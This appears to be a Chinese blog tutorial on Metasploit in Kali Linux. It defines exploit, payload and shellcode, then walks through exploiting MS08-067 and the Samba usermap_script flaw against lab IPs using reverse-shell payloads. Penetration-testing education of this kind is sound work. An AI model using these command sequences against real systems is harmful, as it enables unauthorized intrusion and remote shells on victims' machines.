Kali 渗透测试—Metasploit
Metasploit 并不仅仅是一个工具软件,它是为自动化实施经典的、常规的,或复杂新颖的攻击提供基础设施支持的一个完整框架平台。
Metasploit 中提供了渗透攻击模块、攻击载荷和编码器来轻易实施一次渗透攻击,也可以更近一步编写执行更为复杂的攻击技术。
专业术语
-
渗透攻击(Exploit)
渗透攻击是指有攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。 -
攻击载荷(Payload)
攻击载荷就是我们期望目标系统在本渗透攻击之后去执行的代码,在Metasploit 框架中可以自由地选择、传送和植入。 -
Shellcode
Shellcode 是指在渗透攻击时作为攻击载荷运行的一组机器指令。 -
模块(Module)
一个模块是指Metasploit 框架中所使用的一段软件代码组件。 -
监听器(Listener)
监听器是Metasploit 中用来等待连入网络连接的组件。
目录
启动MSF
- 命令行
# msfconsole - 图形界面
# armitage
msf > show exploits
这个命令会显示Metasploit 框架中所有可用的攻击模块。
msf > show auxiliary
这个命令会显示所有辅助模块以及它们的用途。
msf >search xxx
搜索某个模块
use xxx
使用某个模块
msf > show payloads
显示出payloads
msf > show options
参数是保证Metasploit 框架中各个模块正确运行所需的各种设置
msf > show targets
Metasploit 的渗透攻击模块通常可以列出受到漏洞影响目标系统的类型。举例来说,针对MS08_067漏洞的攻击依赖于硬编码的内存地址,所以这个攻击仅针对特定的操作系统版本,且只适用于特定的补丁级别、语言版本以及安全机制实现。
info
显示本模块的详细信息。
目录
MS08_067 的利用
环境说明
@ 攻击机
Kali
@ 靶机
172.18.11.28
相关命令
# nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 10.10.10.130
# msfconsole 启动metasploit
msf > search ms08-067(是中横线,不是下划线)
msf > use exploit/windows/smb/ms08_067_netapi
msf > set payload windows/meterpreter/reverse_tcp (任选其一)
msf > set payload generic/shell_reverse_tcp (任选其一)
msf > show targets
msf > set target 7(选择window XP SP3)
msf > show options
msf > set RHOST 目标IP
msf > set LHOST 本机IP
msf > set LPORT 本机端口未被占用
msf > exploit
远程溢出Samba
环境说明
@ 攻击机
Kali
@ 靶机
10.10.10.254
相关命令
msf > use exploit/multi/samba/usermap_script
msf > show options
msf > set RHOST 目标地址
msf > exploit
- Kali之Metasploit渗透测试-漏洞扫描与复现
- 小白日记30:kali渗透测试之Web渗透-扫描工具-Skipfish
- kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail
- chapter1 渗透测试与metasploit
- metasploit 渗透测试(ftp)
- 小白日记19:kali渗透测试之选择和修改EXP
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
- kali-linux渗透测试之wireshark——数据包分析
- Kali渗透测试学习
- 小白日记26:kali渗透测试之提权(六)--收集敏感信息,隐藏痕迹
- Kali 渗透测试- 全主动信息收集-发现
- 《Kali Linux 渗透测试技术详解》笔记之 metasploit 学习纪要
- 小白日记12:kali渗透测试之服务扫描(二)-SMB扫描
- 小白日记14:kali渗透测试--NMAP
- metasploit渗透测试
- 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD
- 小白日记32:kali渗透测试之Web渗透-扫描工具-QWASP_ZAP
- MetaSploit渗透测试平台之应用视频教程